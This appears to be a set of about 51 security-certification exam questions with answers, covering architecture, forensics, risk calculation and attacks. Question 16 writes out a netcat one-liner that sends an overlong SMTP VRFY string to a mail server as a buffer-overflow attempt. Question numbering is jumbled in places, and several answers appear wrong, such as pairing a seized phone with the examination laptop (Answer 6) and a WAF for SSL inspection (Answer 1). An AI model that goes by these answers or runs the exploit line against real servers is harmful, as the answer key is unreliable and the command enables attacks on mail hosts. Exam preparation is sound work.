80 Questions from Wilfredo

Question 1

An organization is moving to a new data center. Management has issued a mandate to fix some of the existing security deficiencies in the organization. The following requirements have been set by the management team: Requirement 1: the solution must be able to enforce segregation of critical system Requirement 2: the solution must be able to provide SSL inspection for our user’s web traffic Requirement 3: provide a single network entry point for external applications Requirement 4: enable availability of external networks Drag and drop the BEST security solutions to meet the above requirements

Answer 1

Requirement 1: VLANs Requirement 2: WAF Requirement 3: Reverse Proxy Requirement 4: Forward Proxy

Question 2

Question 5 An insurance company has a number of disparate web-based applications, which include a CRM, broker portal, and policy system. Some of the applications are hosted internally on the network and other externally as SaaS. Brokers can access the solution through either a mobile, tablet, or full desktop browsers as they are constantly on the move. Broker feedback has come back with the following requirements enhancements for the next release of the solution: Requirement 1: provide limited functionality on the website using a social media account Requirement 2: provide SSO between each of the applications Requirement 3: authorize internal web services on the ESB Requirement 4: support step-up authentication for any changes to PII in the application.

Answer 2

Requirement 1: oAuth Requirement 2: SAML Requirement 3: WS-Federation Requirement 4: Active Director

Question 3

Encryption algorithms?

Answer 3

DES, 3DES, AES, SEAL

Question 4

Hashing algorithms?

Answer 4

MD5, SHA

Question 5

A security administrator is seeking to establish awareness of emerging threats, and use threat information to build a robust SOC. Which of the following will BEST help the security administrator accomplish this goal? (Select THREE

Answer 5

A. Security conferences
B. RFI’s to industry peers
E. Threat intelligence feeds

Question 6

While conducting a forensic investigation, a security engineer is asked to secure a smartphone. Based on the make and model, the engineer knows the device supports internal memory cards, wireless, and Bluetooth connections. Which of the following are the MOST suitable best practices to follow? (Select TWO) A. Secure a reliable internet connection for the device B. Pair the device with the examination laptop C. Seal the device into a faraday bag D. Provide a reliable power source to the device E. Immediately power off the device F. Detach the memory card from the device

Answer 6

aNSWER: B AND D

Question 7

The IT department is charged with developing a solution that will enable all employees to quickly reach other employees and communicate securely amongst them in real time. The solution must implement encrypted file transfer and voice communication and must integrate with the existing email and calendaring system. Which of the following MUST the solution implement to ensure employees can make educated decisions about when to contact other employees? A. Messaging B. Presence C. Peer-to-peer D. Social Media

Answer 7

B. PRESENCE

Question 8

A company security administrator attempts to perform a factory reset on the phone issued to a fired employee. The administrator receives an error that the device is not available. Which of the following is likely the reason why the reset failed?

Answer 8

A. The employee has disabled network connectivity to the phone

Question 9

The online banking credentials of the Chief Executive Officer (CEO) of a research company were recently compromised. Despite the fact that banks no longer require frequent password changes, the CEO frequently changed this password. Now, because of the experience, the CEO questions the value of routine password changes at the company. Which of the following communicates the BEST approach for the company’s security policies?

Answer 9

C. The nature of the research company’s threat may be different from banks, so the company should consider the specific threats it needs to address.

Question 10

The Chief Information Security Officer (CISO) informs the team that since the organization will sign a NDA with any potential suppliers, the most current industry evaluation should include details of tests performed by the supplier’s auditors and the associated results. Based on the requirements provided by the CISO, which of the following reports should be requested in the RFP?

Answer 10

B. SOC 2

Question 11

An IT manager has received the following email from the Chief Information Officer (CIO): On a recent business trip, I sat next to another executive and we talked about a new teleconferencing solution that his organization had recently switched to. He said switching to it saved them lots of money and that it worked much better than their current solution and had a lot of new features. I know we utilize a solution that is hosted in-house, but I’d like you to evaluate this is a potential solution.
Based on the information above, which of the following actions should the IT manager take to collaborate within the organization and evaluate the security of a potential solution?

Answer 11

C. Work with the telecom manager to determine if the alternative provides an equivalent security posture compared to the existing solution, if it provides an equivalent feature set, and what the result of a cost/benefit analysis is.

Question 12

The finance department for an online shopping website has discovered that a number of customers were able to purchase goods and services without any payments. Further analysis conducted by the security investigations team indicated that the website allowed customers to update a payment amount for shipping. A specially crafted value could be entered and cause a roll over, resulting in the shipping cost being subtracted from the balance and in some instances resulted in a negative balance. As a result, the system processed the negative balance as zero dollars. Which of the following BEST describes the application issue?

Answer 12

C. Integer overflow

Question 13

A security analyst has been asked to perform a risk assessment on a human resources overflow and give a recommendation to improve the security. While performing the analysis, the security analyst finds the human resources department needs to quickly share employee information with a third-party vendor in an ongoing fashion. The human resources manager is concerned that any modification to the workflow will prevent the data from being received in time. At the end of the assessment which of the following is the BEST solution?

Answer 13

B. Recommend a cloud storage service for collaboration

Question 14

Security architects often have to design systems for environments where different stakeholders have competing requirements. In addition to internal influences and competitors, which of the following often has a major effect on mandatory system design features?

Answer 14

D. D. Regulatory entities

Question 15

A security engineer is analyzing security differences between commercial products. The engineer is implementing one-time password authentication schemes that are based on software or hardware tokens where the secret key is shared between the server and the token. Which of the following BEST describes the main design differences?

Answer 15

B. Software token devices must implement encryption techniques to emulate an equivalent security level as hardware tokens.

Question 16

During a routine vulnerability assessment, the following command was successful: echo “vrfy perl –e print “hi” x 500 ` ` “ | nc www.company.com 25 Which of the following vulnerabilities is being exploited?

Answer 16

A. Buffer overflow directed at a specific host MTA

Question 17

A company develops a wide array of proprietary software for its clients utilizing an agile development methodology. Many of the company’s prominent products use various open source libraries. Recently, a vulnerability in an open source security library allowed malicious attackers to bypass certificate revocation lists to compromise secure data. Which of the following is BEST implemented to help prevent this in the future?

Answer 17

D. The company should include the open source libraries in its code review process at regular intervals during the SDLC.

Question 18

A security administrator is assisting law enforcement in collecting evidence of a computer crime. The administrator has access to the latest forensics tools. The computer system being examined is still running and has not been tampered with since law enforcement arrived. The security administrator needs to collect as much information as possible before transporting the computer to a laboratory. Which of the following is the BEST order in which to proceed?

Answer 18

D. Image RAM, image the HDD/SSD while running the OS, copy system NVRAM, shutdown the system for transport

Question 19

A bank is looking to provide a service to allow customers to view their account balances without logging into the Internet banking portal. The bank sees the benefit in reducing the number of authentication calls for low-risk, high-load transactions. The primary goal would be to improve overall performance and provide new functionality to customers. As part of the project, the bank wants to enable this access capability through mobile devices and browsers. Which of the following solutions will meet the bank’s requirements?

Answer 19

C. Enable an API call utilizing OAuth

Question 20

A public utility company has recently seen an increase in spear phishing attacks that have occurred against targeted employees. The company is relatively small and uses manual processes to monitor such attacks. The company then receives a report that the public website has been defaced with hacktivist comments. The company cannot isolate the server, as certain components are used to process payments via the public website, but quickly remediates the defacement. Which of the following MOST likely occurred in addition to the defacement?

Answer 20

B. The email system was compromised

Question 21

A security architect is designing a series of technical protect, detect, and respond security capabilities with significant automation potential. One of the objectives is to ensure tools from various vendors can be implemented and support standardizes data exchange. The architect would like to initially select a solution that supports automated configuration checklists. Which of the following solutions should be selected?

Answer 21

B. SCAP

Question 22

Company XYZ has a large sales force that works from home. To increase sales effectiveness and reduce travel costs, the company purchased video conferencing equipment for all home offices. Since using the video conferencing equipment, some customers have begun to demand lower prices. The company’s senior officers suspect these customers know the company’s margins, because members of the sales force keep printed proprietary information in their home offices. Which of the following represents the BEST immediate response action while the security team develops a more complete response?

Answer 22

C. Enforce a clear field of view policy during customer teleconferences.

Question 23

An existing financial system has identified vulnerabilities and the vendor has recommended an upgrade. The company, however, has planned to replace the system with a competing product costing $200,000 within 3 years. The security engineer has estimated that a breach of the existing system would have an ARO of 2 and a SLE of $40,000. The Chief Information Officer (CIO) continues with the plan to upgrade in 3 years. Which of the following BEST describes how the CIO addressed the risk of the existing product?

Answer 23

D. The CIO accepted the risk

Question 24

Some operating systems and applications come with a default shared and privileged users. The Chief Information Security Officer (CISO) requires Joe, a security administrator, to develop a security policy and a related procedure to establish individualized access to meet CIA objectives and address legal and regulatory requirements. Which of the following is the MOST important administrative control that should be required in the policy and procedure? (Select TWO)

Answer 24

A. User accountability

B. Least privilege

Question 25

A penetration tester attempts to trick the Chief Executive Officer’s (CEO) administrative assistant into running a malicious .exe file hosted on a remote server by sending the URL to the .exe in a carefully crafted email. The penetration tester would like to create the .exe file so that, upon execution, it initiates a TLS-secured TCP connection to a remote server, thereby giving the penetration tester remote access to the assistant’s computer. Which of the following tools would the penetration tester use to create the .exe file?

Answer 25

A. Metasploit

Question 26

While analyzing network traffic, a security engineer discovers that confidential emails were passing between two users who should not have had this information. The two users deny sending confidential emails to each other. Which of the following security practices would allow for non-repudiation and prevent the users from removing emails such these from their accounts? (Select TWO)

Answer 26

A. Digital signature

C. Legal hold

Question 27

An employee from finance was dismissed when it was discovered that the employee had been committing financial fraud for several years. The most trusted senior manager in finance has been reassigned the duty of performing wire transfers. The Chief Financial Officer (CFO), is asking the Chief Information Security Officer (CISO) to implement stronger controls to secure how the transfers are performed. Which of the following responses should the CISO deliver?

Answer 27

C. Implement DLP at the gateway, and implement two-factor authentication on the workstation where the transactions are performed.

Question 28

During a new desktop refresh, all hosts are hardened at the OS level before deployment to comply with policy. Six months later, the company is audited for compliance to regulations. The audit discovers that 30 percent of the desktops do not meet regulations because the devices are consistently being changed to override settings that do not meet policy. Which of the following is the BEST solution to correct the issue and prevent future noncompliance?

Answer 28

D. Implement group policy to enforce configuration settings

Question 29

During a routine audit of the organization’s information systems, the auditing team notified the organization of a new requirement in another country which requires all financial transaction data to be encrypted in transit as well as at rest. The organization does business in this country, but the data is hosted at a set of redundant data centers which are outside of the country in question. Based on the scenario provided, which of the following is the MOST appropriate course of action for the Chief Information Security Officer (CISO) to take in addressing this new requirement?

Answer 29

A. Conduct further research to determine the scope and details of the new requirement

Question 30

A security administrator needs an external vendor to correct an urgent issue with an organization’s physical access control system (PACS). The PACS does not currently have Internet access because it is running a legacy operating system. Which of the following methods should the security administrator select that BEST balances security and efficiency?

Answer 30

C. Set up new VPN concentrator for the vendor and restrict access to the PACS using desktop sharing

Question 31

An administrator is tasked with securing several website domains on a web server. The administrator elects to secure www.example.com, mail.example.org, archive.example.com, and www.example.org with the same certificate. Which of the following would allow the administrator to secure those domains with a single issued certificate?

Answer 31

D. Subject Alternative Names Certificate

Question 32

After solely reviewing the below output: user@linux:/usr/local/bin$ ls –al total 376 drwxr-xr-x 2 user 4096 2010-09-29 11:35 . drwxrwxrwt 20 root root 348160 2010-09-29 11:35 . . -rwsr-xr-x 1 root user 26188 2010-09-29 11:23 newprog Which of the following can the administrator conclude about the program?

Answer 32

D. The program may lead to a privilege escalation

Question 33

A major healthcare provider was recently fined not following regulatory compliance. The Chief Information Security Officer is concerned that the organization is not trained and aware of cybersecurity related issues. Which of the following is the MOST effective method of gaining access to the organization’s sensitive information?

Answer 33

D. Social engineering

Question 34

Corporate policy prohibits employees from connecting SOHO routers to their office. Using a network analyzer, a security administrator is conducting an assessment to verify if SOHO routers are connected to the enterprise network. The security administrator is analyzing the following PCAP file: 01 04 23 001265 10.234 7.22 50212 > www.comptia 80 P 39438485 (0) ack 39438484 … 01 04 23 009265 10.234 7.22 40033 > www.comptia 80 P 394384433 (0) ack 39438484 … 01 04 23 030265 10.234 7.22 50212 > www.comptia 80 P 39438495 (0) ack 39438484 … Which of the following can the security administrator infer from the above capture?

Answer 34

D. Corporate policy is being followed by all employees and there is no evidence of SOHO routers being connected to the network.

Question 35

A security architect is looking into the following vendor proposal for implementing a secure code scanning platform. Proposal: Software purchase with license fee of $40,000 and a 30% support fee per annum from year 2 onwards. Requires internal hardware hosting which is $5,000. Which of the following is the TCO for this proposal after five years?

Answer 35

D. $93,000

Question 36

A security analyst finds the following web logs after a breach of sensitive information: http://www.data.com/gender.php?val=male http://www.data.com/gender.php?val=female http://www.data.com/gender.php?val=ABC female http://www.data.com/gender.php?val=GHI http://www.data.com/gender.php?val=QRS Female Which of the following describes the attack being performed?

Answer 36

D. Blind SQL injection

Question 37

Which of the following encryption methodologies should be implemented in an environment where all users need access to bulk storage, but not all users have authorized access to each individual database entry?

Answer 37

A. Row-level encryption

Question 38

Senior management wants to prevent sensitive data from being leaked onto the web, however, they cannot afford a mature DLP solution. A security administrator has been tasked with finding an alternative solution. After researching multiple products, the security administrator recommends implementing a:

Answer 38

B. WAF

Question 39

The functional testing team at a large organization uses a test harness framework. This allows the testing team to perform automated regression testing on a nightly basis for both infrastructure and web applications. The penetrator testing team currently performs manual and targeted testing at major project delivery milestones. The project management team has placed cost and time pressures on security testing. Which of the following will allow the penetration testers to BEST ensure security testing activities occur more frequently and at reduced cost? (Select TWO)

Answer 39

C. Cross-train the functional testing team so team members understand how to perform basic security tests.
E. Provide security test cases to the functional testing team for integration into the existing test harness.

Question 40

Question 47 A solutions architect attempts to make an update to a server and is prevented from changing the application. Additionally, the server would not allow the architect to see application errors related to the issue. The security log reports that file attributes can only be changed by the web server application and not the solution architect’s custom application. The architect verifies that all file system permissions are correct and all application services are running properly. Which of the following is MOST likely being used on the server and is causing the issue?

Answer 40

A. A trusted operating system

Question 41

Question 48 The data backup window has expanded into the morning hours and has begun to affect production users. The main bottleneck in the process is the time it takes to replicate the backups to separate severs at the offsite data center. Which of the following uses of deduplication could be implemented to reduce the backup window?

Answer 41

C. Implement deduplication on the server storage to reduce the data backed up

Question 42

To ensure a company is adhering to regulatory requirements, a process is in place to check security controls such as separation of duties. Which of the following is this process called?

Answer 42

D. Continuous monitoring

Question 43

A security administrator is scheduling an internal network vulnerability scan for the first time. The administrator has scheduled a one-week scanning window but is not known how long the scan will take. Which of the following BEST explains what the administrator should do to reduce the risk of causing unknown impacts to the environment? (Select TWO)

Answer 43

A. Commence the scan at the start of the scanning window and ensure DoS signatures are disabled.
C. Update the plugins to the latest versions and disable time-consuming or resource consuming plugins.

Question 44

Which of the following provides the BEST risk calculation methodology?

Answer 44

B. Potential Loss x Event Probability x Control Failure Probability

Question 45

An organization utilizes full packet capture on all network traffic in its environment. A security analyst is inspecting a packet capture of the traffic to a web server that occurred prior to the system being compromised. The analyst notices a string of 100 occurrences of 09. Which of the following attacks MOST likely occurred?

Answer 45

A. Integer flow

Question 46

The security architect has been asked by the web development team for a way to authenticate to an external company’s CRM application across the internet. The web application needs to authenticate through the browser, maintain session state, and be a known identity management control. Which of the following solutions is MOST likely to be the correct standard to use.

Answer 46

B. SAML

Question 47

The Information Security Officer (ISO) has submitted a $500,000 budget request for the next three years to purchase network equipment in support of the newly upgraded Internet bandwidth, which is now 400Mbps. The IT department plans to implement a chargeback system to recover the costs incurred from the new equipment. The ISO forecasts that the IT department will be able to recuperate $1/GB utilized. Which of the following is the five year ROI the ISO is expecting, based on a projected average bandwidth utilization of 2TB/Day?

Answer 47

D. 630%

Question 48

An internal development team has migrated away from Waterfall development to use Agile development. Overall, this has been viewed as a successful initiative by the stakeholders as it has improved time-to-market. However, some staff within the security team have contended that Agile development is not secure. Which of the following is the MOST accurate statement?

Answer 48

D. Agile development has different phases and timings compared to Waterfall. Security activities need to be adapted and performed within relevant Agile phases.

Question 49

Joe, a penetration tester, is tasked with testing the security robustness of the protocol between a mobile web application and a RESTful application server. Which of the following security tools would be requires to assess the security between the mobile web application and the RESTful application server? (Select TWO)

Answer 49

D. HTTP interceptor

E. Vulnerability scanner

Question 50

A university has implemented a commercial emergency notification system that alerts users to an emergency on campus with text messages and voice calls. A system administrator must develop a small application that would send desktop notifications in the event of an emergency, since it is not supported by the commercial system. Which of the following should be considered when deciding to implement this application in-house? (Select TWO)

Answer 50

C. Ease of usability

D. Ongoing support of the application

Question 51

A company provides on-demand cloud computing resources for a sensitive project. The company implements a fully virtualized datacenter and terminal server access with two-factor authentication for customer access to the administrative website. The security administrator at the company has uncovered a breach in data confidentiality. Sensitive data from customer A was found on a hidden directory within the VM of company B. Company B is not in the same industry as company A and the two are not competitors. Which of the following has MOST likely occurred?

Answer 51

A. Both VMs were left unsecured and an attacker was able to exploit network vulnerabilities to access each and move the data.